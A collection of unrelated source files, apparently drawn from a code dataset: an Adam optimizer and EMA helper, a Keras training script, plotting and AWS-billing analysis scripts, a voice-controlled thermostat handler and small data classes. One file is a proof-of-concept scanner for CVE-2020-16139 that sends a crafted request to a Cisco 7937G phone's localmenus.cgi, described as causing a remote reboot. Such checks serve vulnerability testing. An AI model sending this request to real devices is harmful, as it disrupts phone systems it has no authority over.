raise ValueError(f"Invalid beta parameter: {betas[0]} - should be in [0.0, 1.0[")
if not 0.0 <= betas[1] < 1.0:
raise ValueError(f"Invalid beta parameter: {betas[1]} - should be in [0.0, 1.0[")
if not 0.0 <= eps:
raise ValueError(f"Invalid epsilon value: {eps} - should be >= 0.0")
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay, correct_bias=correct_bias)
super().__init__(params, defaults)
def step(self, closure: Callable = None):
"""
执行单步优化
参数:
closure (:obj:`Callable`, `optional`):
评估模型并返回loss,是一个闭包
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group["params"]:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError("Adam does not support sparse gradients, please consider SparseAdam instead")
state = self.state[p]
# state初始化
if len(state) == 0:
state["step"] = 0
# 一阶梯度的指数加权移动平均,也即累积一阶动量的计算
state["exp_avg"] = torch.zeros_like(p.data)
# 二阶梯度的指数加权移动平均,也即累积二阶动量的计算
state["exp_avg_sq"] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
beta1, beta2 = group["betas"]
state["step"] += 1
# 计算一二阶梯度的beta系数下的衰减值,并进行更新
exp_avg.mul_(beta1).add_(grad, alpha=1.0 - beta1)
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1.0 - beta2)
denom = exp_avg_sq.sqrt().add_(group["eps"])
step_size = group["lr"]
# 修正bias,对于bert来说,不需要执行此操作
if group["correct_bias"]:
bias_correction1 = 1.0 - beta1 ** state["step"]
bias_correction2 = 1.0 - beta2 ** state["step"]
step_size = step_size * math.sqrt(bias_correction2) / bias_correction1
p.data.addcdiv_(exp_avg, denom, value=-step_size)
# 权重衰减项,目的是为了解决在adam等自适应优化算法中由于m和v的相互作用导致的L2正则表现不佳的情况。
# 使用权重衰减,能使得每个梯度都以相同的比例进行衰减(等价于SGD下的L2正则)
if group["weight_decay"] > 0.0:
p.data.add_(p.data, alpha=-group["lr"] * group["weight_decay"])
return loss
class ExponentialMovingAverage():
'''
模型权重的指数滑动平均
注意区别于类似adam一类的自适应学习率优化器,针对一阶二阶梯度的指数滑动平均,两者完全不同
例子:
# 初始化
ema = ExponentialMovingAverage(model, 0.999)
# 训练过程中,更新完参数后,同步update ema_weights weights
def train():
optimizer.step()
ema.update()
# eval前,调用apply_ema_weights weights;eval之后,恢复原来模型的参数
def evaluate():
ema.apply_ema_weights()
# evaluate
# 如果想保存ema后的模型,请在reset_old_weights方法之前调用torch.save()
ema.reset_old_weights()
'''
def __init__(self, model, decay):
self.model = model
self.decay = decay
# 保存ema权重(当前step的每一层的滑动平均权重)
self.ema_weights = {}
# 在进行evaluate的时候,保存原始的模型权重,当执行完evaluate后,从ema权重恢复到原始权重
self.model_weights = {}
# 初始化ema_weights为model_weights
for name, param in self.model.named_parameters():
if param.requires_grad:
self.ema_weights[name] = param.data.clone()
def update(self):
for name, param in self.model.named_parameters():
if param.requires_grad:
assert name in self.ema_weights
new_average = (1.0 - self.decay) * param.data + self.decay * self.ema_weights[name]
self.ema_weights[name] = new_average.clone()
def apply_ema_weights(self):
for name, param in self.model.named_parameters():
if param.requires_grad:
assert name in self.ema_weights
self.model_weights[name] = param.data
param.data = self.ema_weights[name]
def reset_old_weights(self):
for name, param in self.model.named_parameters():
if param.requires_grad:
assert name in self.model_weights
param.data = self.model_weights[name]
self.model_weights = {}
# def extend_with_exponential_moving_average(BaseOptimizer, model):
# class EmaOptimizer(BaseOptimizer):
# # @insert_arguments(ema_momentum=0.999)
# def __init__(self, model, *args, **kwargs):
# super(EmaOptimizer, self).__init__(*args, **kwargs)
# self.model = model
# # 保存ema权重(当前step的每一层的滑动平均权重)
# self.ema_weights = {}
# # 在进行evaluate的时候,保存原始的模型权重,当执行完evaluate后,从ema权重恢复到原始权重
# self.model_weights = {}
# # 初始化ema_weights为model_weights
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# self.ema_weights[name] = param.data.clone()
# def step(sel, closure: Callable = None):
# """
# 执行单步优化
# 参数:
# closure (:obj:`Callable`, `optional`):
# 评估模型并返回loss,是一个闭包
# """
# loss = None
# if closure is not None:
# loss = closure()
# loss = super(NewOptimizer, self).step()
# self.update()
# return loss
# def update(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.ema_weights
# new_average = (1.0 - self.decay) * param.data + self.decay * self.ema_weights[name]
# self.ema_weights[name] = new_average.clone()
# def apply_ema_weights(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.ema_weights
# self.model_weights[name] = param.data
# param.data = self.ema_weights[name]
# def reset_old_weights(self):
# for name, param in self.model.named_parameters():
# if param.requires_grad:
# assert name in self.model_weights
# param.data = self.model_weights[name]
# self.model_weights = {}
# return EmaOptimizer | StarcoderdataPython |
3278274 | <gh_stars>0
# -*- coding: utf-8 -*-
#from keras.applications.inception_v3 import InceptionV3
from keras.models import Model,load_model
from keras.layers import Dense,GlobalAveragePooling2D,Flatten, Input
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.resnet50 import preprocess_input, decode_predictions
import numpy as np
input_tensor = Input(shape=(200,200,1))
model = ResNet50(include_top=True,weights=None,input_tensor =input_tensor,classes=34)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
train_datagen = image.ImageDataGenerator(rescale=1./255)
test_datagen = image.ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
'dataset42',
target_size=(200, 200),
color_mode='grayscale',
batch_size=84)
#colormode
validation_generator = test_datagen.flow_from_directory(
'data/train',
target_size=(200, 200),
color_mode='grayscale',
batch_size=84)
model.fit_generator(
train_generator,
steps_per_epoch=17,
epochs=10,
validation_data=validation_generator,
validation_steps=4)
model.save('weight3.h5')
# ,validation_data=validation_generator, validation_steps=30
| StarcoderdataPython |
48268 | import pandas as pd
import utils as ut
import constants as cs
import matplotlib.pyplot as plt
import numpy as np
import datetime
import calendar
import time
import math
# Create list of files to analyze
def createFileList(results_path, scenario_list, scenario_file):
fileList = []
for i in scenario_list:
fileList.append(results_path + i[0] + '/' + scenario_file)
return fileList
def line_plot_summary_hourly_analysis(file_list, scenario_list, plot_parameter, plot_output_file, plot_title):
scenario_count = 0
scenario_colors = ['lightblue', 'lightgreen', 'lightgrey', 'cyan', 'magenta', 'darkgrey', 'khaki', 'limegreen']
# Creating Plot
fig1 = plt.figure(figsize=(7, 6))
plt.suptitle(plot_title, fontsize=20)
ax1 = plt.subplot(111)
for i in file_list:
scenario = scenario_list[scenario_count][0]
df = pd.read_csv(i, delimiter=',')
x_axis_data = range(1, len(df) + 1)
y_axis_data = df[plot_parameter].tolist()
print y_axis_data
l1 = ax1.plot(x_axis_data, y_axis_data, color=scenario_colors[scenario_count], label=scenario, linewidth=1.5)
scenario_count += 1
ax1.grid(True)
handles, labels = ax1.get_legend_handles_labels()
plt.legend(ut.flip(handles, 2), ut.flip(labels, 2), bbox_to_anchor=(0.5, 1.12), loc=9, ncol=4, prop={'size':15})
ax1.set_xlabel('Hourly Interval', fontsize=20)
ax1.set_ylabel(plot_parameter, fontsize=20)
fig1.savefig(plot_output_file, format='pdf')
print "Saving to %s" %(plot_output_file)
#plt.show()
def bar_plot_average_hourly_analysis(file_list, scenario_list, plot_parameter, plot_output_file, plot_title):
scenario_patterns = [ "/" , "\\" , "|" , "-" , "+" , "x", "o", "O", ".", "*" ]
scenario_count = 0
# Creating Plot
fig1 = plt.figure(figsize=(7, 6))
plt.suptitle(plot_title, fontsize=20)
ax1 = fig1.add_subplot(111)
# Create X Axis
x_axis_list = []
for i in scenario_list:
x_axis_list.append(i[0])
x_axis_list = x_axis_list
y_axis_list = []
for i in file_list:
scenario = scenario_list[scenario_count][0]
df = pd.read_csv(i, delimiter=',')
if (plot_parameter == cs.HOUR_SUMMARY_SUM_REQS_SUCCESS or plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
y_axis_data = df[plot_parameter].describe().iloc[1]
if plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY:
y_axis_data = y_axis_data / 1000
if (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED or plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION or plot_parameter == cs.HOUR_SUMMARY_SUM_RESP_500):
y_axis_data = df[plot_parameter].sum()
if (plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION):
print df[plot_parameter].tolist()
y_axis_data = df[plot_parameter].sum() / 3600
if (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
y_axis_data = (1 - (float(df[cs.HOUR_SUMMARY_SUM_REQS_SUCCESS].sum()) / float(df[cs.HOUR_SUMMARY_SUM_ALL_REQS].sum())))
y_axis_list.append(y_axis_data)
# Calculating Percentages
if (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
min_error_rate = min(y_axis_list)
percent_diff_t4 = (1 - (min_error_rate / y_axis_list[3])) * 100
percent_diff_t5 = (1 - (min_error_rate / y_axis_list[4])) * 100
print min_error_rate
print y_axis_list
print percent_diff_t4
print percent_diff_t5
if (plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
print y_axis_list
# Average when distributing the stack in two VMs and one VM
# avg T1,T3,T6
avg_t16 = (y_axis_list[0] + y_axis_list[5]) / 2
# avg T2,T7
avg_t27 = (y_axis_list[1] + y_axis_list[6]) / 2
print "Analysis between full stack vm and separate vms"
print 1 - (avg_t27 / avg_t16)
# Analysis between separate vms and database as a service
print "Analysis separate vms and database as a service"
avg_t1 = y_axis_list[0]
avg_t3 = y_axis_list[2]
print 1 - (avg_t1 / avg_t3)
# Analysis between container (azure) and separate vms and DBaaS
print "Analysis between container (azure) and separate vms and DBaaS"
avg_t8 = y_axis_list[7]
avg_t6 = y_axis_list[5]
print 1 - (avg_t6 / avg_t8)
print "Provider Comparison"
print "VMs distributed"
avg_t1 = y_axis_list[0]
avg_t6 = y_axis_list[5]
print 1 - (avg_t1 / avg_t6)
print "VMs full stack"
avg_t2 = y_axis_list[1]
avg_t7 = y_axis_list[6]
print 1 - (avg_t2 / avg_t7)
if (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED):
print y_axis_list
gb_list = [i / math.pow(2,30) for i in y_axis_list]
print gb_list
x_axis_num = np.arange(1, len(x_axis_list) + 1)
ax1.bar(x_axis_num, y_axis_list, align='center', color='grey', edgecolor='black', alpha=0.85)
ax1.set_xticks(x_axis_num)
ax1.set_xticklabels(x_axis_list, fontsize=20)
if (plot_parameter == cs.HOUR_SUMMARY_TIMESTAMP_DURATION):
ax1.set_ylabel('Experiment Duration (h)', fontsize=20)
elif (plot_parameter == cs.HOUR_SUMMARY_AVG_LATENCY):
ax1.set_ylabel('Average Latency (s)', fontsize=20)
elif (plot_parameter == cs.HOUR_SUMMARY_ERROR_RATE):
ax1.set_ylabel('Average Error Rate', fontsize=20)
elif (plot_parameter == cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED):
ax1.set_ylabel('Total Bytes Transferred', fontsize=20)
else:
ax1.set_ylabel(plot_parameter, fontsize=20)
#ax1.set_xlabel('$T^{\mu}_{i}$', fontsize=15)
ax1.grid(True)
#fig1.savefig(plot_output_file, format='pdf')
#print "Saving to %s" %(plot_output_file)
#plt.show()
file_list = createFileList(cs.EXP_RESULTS_DATA_PATH, cs.EXP_RESULTS_DATA_SCENARIOS, cs.SUMMARY_HOURLY_RESULTS_OUTPUT_FILE_NAME + '.csv')
print file_list
#line_plot_summary_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_REQS_SUCCESS,
# cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_REQ_SUCCESS_FILE, '')
#bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_REQS_SUCCESS,
# cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_REQ_SUCCESS_FILE, cs.PLOT_RESULTS_TITLE_REQ_SUCCESS)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_AVG_LATENCY,
cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_LATENCY_FILE, cs.PLOT_RESULTS_TITLE_LATENCY)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_TIMESTAMP_DURATION,
cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_EXP_DURATION_FILE, cs.PLOT_RESULTS_TITLE_DURATION)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_BYTES_TRANSFERRED,
cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_BYTES_TRANSFERRED_FILE, cs.PLOT_RESULTS_TITLE_BYTES_TRANSFERRED)
#bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_SUM_RESP_500,
# cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_SERVER_FAILURE_FILE, cs.PLOT_RESULTS_TITLE_REQ_SERVER_FAILURE)
bar_plot_average_hourly_analysis(file_list, cs.EXP_RESULTS_DATA_SCENARIOS_LABELS, cs.HOUR_SUMMARY_ERROR_RATE,
cs.PLOT_RESULTS_DATA_PATH + cs.PLOT_RESULTS_TRANSACTION_ERROR_RATE_FILE, cs.PLOT_RESULTS_TITLE_TRANSACTION_ERROR_RATE)
| StarcoderdataPython |
3368856 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Author: <NAME> 2018
# http://blog.onlinux.fr
#
#
# Import required Python libraries
import os
import logging
import logging.config
from thermostat import Thermostat
from thermostat import Constants
from hermes_python.hermes import Hermes
from snipshelpers.config_parser import SnipsConfigParser
# Fixing utf-8 issues when sending Snips intents in French with accents
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
CONFIG_INI = "config.ini"
MQTT_IP_ADDR = "localhost"
MQTT_PORT = 1883
MQTT_ADDR = "{}:{}".format(MQTT_IP_ADDR, str(MQTT_PORT))
THERMOSTAT = 'ericvde31830:thermostat'
THERMOSTATSET = 'ericvde31830:ZibaseThermostatSet'
THERMOSTATSHIFT = 'ericvde31830:thermostatShift'
THERMOSTATTURNOFF = 'ericvde31830:thermostatTurnOff'
THERMOSTATMODE = 'ericvde31830:thermostatMode'
# os.path.realpath returns the canonical path of the specified filename,
# eliminating any symbolic links encountered in the path.
path = os.path.dirname(os.path.realpath(sys.argv[0]))
configPath = path + '/' + CONFIG_INI
logging.config.fileConfig(configPath)
logger = logging.getLogger(__name__)
def open_thermostat(config):
ip = config.get(
'secret', {
"ip": "192.168.0.100"}).get(
'ip', '192.168.0.100')
tempVariableId = int(
config.get(
'global', {
"tempvariable": "28"}).get(
'tempvariable', '28'))
setpointDayVariableId = config.get(
'global', {
"setpointdayvariable": "29"}).get(
'setpointdayvariable', '29')
setpointNightVariableId = config.get(
'global', {
"setpointnightvariable": "29"}).get(
'setpointnightvariable', '30')
modeVariableId = config.get(
'global', {
"modevariable": "29"}).get(
'modevariable', '31')
stateVariableId = config.get(
'global', {
"statevariable": "13"}).get(
'statevariable', '13')
thermostatScenarioId = config.get(
'global', {
"thermostatscenario": "17"}).get(
'thermostatscenario', '17')
thermostatProbeId = config.get(
'global', {
"thermostatprobeid": "13"}).get(
'thermostatprobeid', '13')
thermostat = Thermostat(
ip,
int(tempVariableId),
int(setpointDayVariableId),
int(setpointNightVariableId),
int(modeVariableId),
int(stateVariableId),
int(thermostatScenarioId),
int(thermostatProbeId))
logger.debug(" Address ip zibase:{}".format(ip))
logger.debug(" Indoor Temperature:{}".format(
thermostat.tempStr(thermostat.getTemp() / 10.0)))
logger.debug(" Thermostat Mode:{}".format(thermostat.getModeString()))
logger.debug(" Thermostat State:{}".format(thermostat.getStateString()))
logger.debug(" Thermostat runMode:{}".format(
thermostat.getRunModeString()))
logger.debug(" setpoint Day: {}°C".format(
thermostat.getSetpointDay() / 10.0))
logger.debug(" setpoint Night:{}°C".format(
thermostat.getSetpointNight() / 10.0))
return thermostat
def intent_received(hermes, intent_message):
intentName = intent_message.intent.intent_name
sentence = 'Voilà c\'est fait.'
logger.debug(intentName)
for (slot_value, slot) in intent_message.slots.items():
logger.debug('Slot {} -> \n\tRaw: {} \tValue: {}'
.format(slot_value, slot[0].raw_value, slot[0].slot_value.value.value))
if intentName == THERMOSTATMODE:
thermostat.read()
logger.debug("Change thermostat mode")
if intent_message.slots.thermostat_mode:
tmode = intent_message.slots.thermostat_mode.first().value
logger.debug(
"Je dois passer le thermostat en mode {}".format(tmode))
sentence = "OK, je passe le thermostat en mode {}".format(tmode)
# Invert Thermostat.mode dict first
inv_mode = {value: key for key, value in Constants.mode.items()}
logger.debug(inv_mode)
if tmode in inv_mode:
thermostat.setMode(inv_mode[tmode])
thermostat.update()
else:
sentence = 'Désolée mais je ne connais pas le mode {}'.format(
tmode)
hermes.publish_end_session(intent_message.session_id, sentence)
return
if intentName == THERMOSTATTURNOFF:
thermostat.read()
logger.debug("Thermostat turnOff")
if intent_message.slots.temperature_device:
thermostat.setMode(48) # Turn nightMode on
sentence = "Ok, je passe en mode nuit."
logger.debug(sentence)
hermes.publish_end_session(intent_message.session_id, sentence)
return
if intentName == THERMOSTATSET:
logger.debug("Thermostat Set")
thermostat.read()
if intent_message.slots.temperature_decimal:
temperature = intent_message.slots.temperature_decimal.first().value
logger.debug("Température reconnue:".format, (temperature))
runMode = thermostat.getRunModeString()
mode = thermostat.getModeString()
if runMode == 'nuit' and 'jour' not in mode:
thermostat.setSetpointNight(int(temperature))
sentence = "Ok, je passe la consigne de {} à {} degrés".format(
runMode, str(temperature / 10.0))
elif runMode == 'jour' and 'nuit' not in mode:
thermostat.setSetpointDay(int(temperature))
sentence = "Ok, je passe la consigne de {} à {} degrés".format(
runMode, str(temperature / 10.0))
else:
sentence = "Désolée mais je ne sais pas quelle consigne changer car le mode est {}".format(
mode)
thermostat.update()
hermes.publish_end_session(intent_message.session_id, sentence)
return
if intentName == THERMOSTATSHIFT:
if intent_message.slots.up_down:
up_down = intent_message.slots.up_down.first().value
action = up_down.encode('utf-8')
if action is not None:
setPoint = None
runMode = thermostat.getRunModeString()
mode = thermostat.getModeString()
logger.debug("runMode: {}, Mode: {}".format(
runMode, mode
))
if mode == 'stop' or mode == 'hors gel':
sentence = "Désolée mais nous sommes en mode {}. Je ne fais rien dans ce cas.".format(
mode)
elif action == 'down':
if runMode == 'jour' or 'jour' in mode:
thermostat.addSetpointDay(-1)
setPoint = str(thermostat.getSetpointDay()
/ 10.0).replace('.', ',')
sentence = "Nous sommes en mode {}, je descends donc la consigne de jour à {} degrés.".format(
mode, setPoint)
else:
thermostat.addSetpointNight(-1)
setPoint = str(thermostat.getSetpointNight()
/ 10.0).replace('.', ',')
sentence = "Nous sommes en mode {} économique, je descends donc la consigne de nuit à {} degrés.".format(
mode, setPoint)
elif action == "up":
if 'nuit' not in mode and runMode == 'jour' or 'jour' in mode:
thermostat.addSetpointDay(1)
setPoint = str(thermostat.getSetpointDay()
/ 10.0).replace('.', ',')
sentence = "Nous sommes en mode {}, je monte la consigne de jour à {} degrés.".format(
mode, setPoint)
else:
# switch to mode tempo-jour
if runMode == 'nuit' and mode == 'automatique':
sentence = "Nous sommes en mode {} économique, je passe donc en mode tempo jour".format(
mode)
else:
sentence = "Nous sommes en mode {}, je passe donc en mode tempo jour".format(
mode)
thermostat.setMode(32)
logger.debug("After action-> runMode: {} , mode: {}".format(
thermostat.getRunModeString(), thermostat.getModeString()))
else:
sentence = "Je n'ai pas compris s'il fait froid ou s'il fait chaud."
else:
sentence = "Je ne comprends pas l'action à effectuer avec le thermostat."
logger.debug(sentence)
hermes.publish_end_session(intent_message.session_id, sentence)
return
with Hermes(MQTT_ADDR) as h:
try:
config = SnipsConfigParser.read_configuration_file(configPath)
except BaseException:
config = None
thermostat = None
try:
thermostat = open_thermostat(config)
logger.info('Thermostat initialization: OK')
except Exception as e:
zibase = None
logger.error('Error Thermostat {}'.format(e))
h.subscribe_intents(intent_received).start()
| StarcoderdataPython |
3251020 | import pandas as pd
from pandasql import sqldf
bill = pd.read_csv(
filepath_or_buffer="/Users/jianxlin/Documents/PythonWorkspace/jnc-cmdb/cmdb-usage/tmp/309544246384-aws-billing-detailed-line-items-with-resources-and-tags-ACTS-Ningxia-2020-08.csv.zip")
bill.columns = bill.columns.str.replace(':', '')
bill.rename(columns={"UnBlendedCost": "Cost", "UnBlendedRate": "Rate"}, inplace=True)
bill.fillna("NULL", inplace=True)
usage_start_date = "2020-08-01 00:00:00"
usage_end_date = "2020-09-01 00:00:00"
sql = """
select sum(Cost) as Rounding
from bill
where RecordType = 'Rounding'
"""
rounding = sqldf(sql, {"bill": bill})
rounding["userproject"] = "aiops"
print(rounding)
def run(_sql=None, _bill=None):
b = sqldf(_sql, {"bill": _bill})
pd.set_option('display.max_rows', 10000) # 具体的行数或列数可自行设置
pd.set_option('display.max_columns', 100)
print(b)
return b
sql = """
select *
from bill
where SubscriptionId = "NULL"
""" % locals()
print('SubscriptionId = "NULL" ')
run(sql, bill)
"""
RateId SubscriptionId PricingPlanId UsageType Operation AvailabilityZone ReservedInstance ItemDescription UsageStartDate UsageEndDate UsageQuantity BlendedRate BlendedCost Rate Cost ResourceId userName userkubernetes.io/service-name userproject
1494763 1,320,575,235.0000000000 309544246384 309,544,246,384.0000000000 LineItem 0 NULL 0.0000000000 NULL NULL NULL NULL NULL N 税金 VAT 类型 2020-08-01 00:00:00 2020-08-31 23:59:59 NULL NULL 10,374.7400000000 NULL 10,374.7400000000 NULL NULL NULL NULL
1494764 1,320,575,235.0000000000 309544246384 687,267,341,391.0000000000 LineItem 0 NULL 0.0000000000 NULL NULL NULL NULL NULL N 税金 VAT 类型 2020-08-01 00:00:00 2020-08-31 23:59:59 NULL NULL 43.3400000000 NULL 43.3400000000 NULL NULL NULL NULL
1494765 1,320,575,235.0000000000 309544246384 NULL Rounding NULL NULL NULL NULL NULL NULL NULL NULL NULL 由于整合账单和小时行项目计算流程,该行项目包含舍入错误。 NULL NULL NULL NULL 0.0025652967 NULL -2.5094690054 NULL NULL NULL NULL
1494766 1,320,575,235.0000000000 309544246384 NULL InvoiceTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 发票 1320575235 的总额 NULL NULL NULL NULL 184,053.6000000000 NULL 184,053.6000000000 NULL NULL NULL NULL
1494767 NULL 309544246384 309,544,246,384.0000000000 AccountTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 关联账户# 309544246384 总额 NULL NULL NULL NULL 183,287.8288184949 NULL 183,290.2815696986 NULL NULL NULL NULL
1494768 NULL 309544246384 687,267,341,391.0000000000 AccountTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 关联账户# 687267341391 总额 NULL NULL NULL NULL 765.7686162084 NULL 765.8278993068 NULL NULL NULL NULL
1494769 NULL 309544246384 NULL StatementTotal NULL NULL NULL NULL NULL NULL NULL NULL NULL 2020-08-01 00:00:00 - 2020-08-31 23:59:59 期间内的... NULL NULL NULL NULL 184,053.6000000000 NULL 184,053.6000000000 NULL NULL NULL NULL
""" | StarcoderdataPython |
69445 | <filename>2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco 7937G Denial-of-Service Reboot Attack''',
"description": '''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''',
"severity": "high",
"references": [
"https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-16139",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "dos", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""
method = "POST"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/xml""" in str(resp0.headers)) and ("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | StarcoderdataPython |
1636944 | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.0.1.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .collection_info import CollectionInfo
from .repository_info import RepositoryInfo
from .team_project_info import TeamProjectInfo
from .vsts_info import VstsInfo
__all__ = [
'CollectionInfo',
'RepositoryInfo',
'TeamProjectInfo',
'VstsInfo',
]
| StarcoderdataPython |
3381639 | <reponame>jerrykcode/kkFileView
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# This file incorporates work covered by the following license notice:
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed
# with this work for additional information regarding copyright
# ownership. The ASF licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0 .
#
from ..common.ConfigGroup import ConfigGroup
class CGFax(ConfigGroup):
def __init__(self):
self.cp_Style = int()
self.cp_PrintCompanyLogo = bool()
self.cp_PrintDate = bool()
self.cp_PrintSubjectLine = bool()
self.cp_PrintSalutation = bool()
self.cp_PrintCommunicationType = bool()
self.cp_PrintGreeting = bool()
self.cp_PrintFooter = bool()
self.cp_CommunicationType = str()
self.cp_Salutation = str()
self.cp_Greeting = str()
self.cp_SenderAddressType = int()
self.cp_SenderCompanyName = str()
self.cp_SenderStreet = str()
self.cp_SenderPostCode = str()
self.cp_SenderState = str()
self.cp_SenderCity = str()
self.cp_SenderFax = str()
self.cp_ReceiverAddressType = int()
self.cp_Footer = str()
self.cp_FooterOnlySecondPage = bool()
self.cp_FooterPageNumbers = bool()
self.cp_CreationType = int()
self.cp_TemplateName = str()
self.cp_TemplatePath = str()
| StarcoderdataPython |
16044 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
web socket可用于实时聊天
"""
import websocket
if __name__ == '__main__':
pass
| StarcoderdataPython |
3386883 | from __future__ import annotations
from Bio.Seq import MutableSeq, Seq, reverse_complement
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional, List, Dict, Mapping
import uuid
from kd_splicing.location.models import Location
from kd_common import logutil
_logger = logutil.get_logger(__name__)
@dataclass
class Gene:
__slots__ = "uuid", "record_uuid", "locus_tag", "gene_id", "db_xref", "location"
uuid: uuid.UUID
record_uuid: uuid.UUID
locus_tag: Optional[str]
gene_id: Optional[str]
db_xref: Optional[str]
location: Location
@dataclass
class Isoform:
__slots__ = "uuid", "gene_uuid", "protein_id", "product", "location", "translation", "src_gene_uuid", "rna_uuid"
uuid: uuid.UUID
gene_uuid: uuid.UUID
protein_id: Optional[str]
product: Optional[str]
location: Location
translation: str
src_gene_uuid: Optional[uuid.UUID]
rna_uuid: Optional[uuid.UUID]
@dataclass
class RNA:
__slots__ = "uuid", "gene_uuid", "transcript_id", "location", "src_gene_uuid"
uuid: uuid.UUID
gene_uuid: uuid.UUID
transcript_id: Optional[str]
location: Location
src_gene_uuid: Optional[uuid.UUID]
@dataclass
class DBFile:
__slots__ = "uuid", "src_gb_file", "db_name"
uuid: uuid.UUID
src_gb_file: str
db_name: str
@dataclass
class Record:
__slots__ = "uuid", "file_uuid", "sequence_id", "organism", "taxonomy"
uuid: uuid.UUID
file_uuid: uuid.UUID
sequence_id: str
organism: str
taxonomy: List[str]
@dataclass
class DBPart:
files: Dict[uuid.UUID, DBFile] = field(default_factory=dict)
records: Dict[uuid.UUID, Record] = field(default_factory=dict)
isoforms: Dict[uuid.UUID, Isoform] = field(default_factory=dict)
rnas: Dict[uuid.UUID, RNA] = field(default_factory=dict)
genes: Dict[uuid.UUID, Gene] = field(default_factory=dict)
stats: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
errors: List[str] = field(default_factory=list)
def warn(self, s: str) -> None:
_logger.warn(s)
self.errors.append("[WARN]: " + s)
def exception(self, s: str) -> None:
_logger.exception(s)
self.errors.append("[ERROR]: " + s)
@dataclass
class DB:
files: Dict[uuid.UUID, DBFile] = field(default_factory=dict)
records: Dict[uuid.UUID, Record] = field(default_factory=dict)
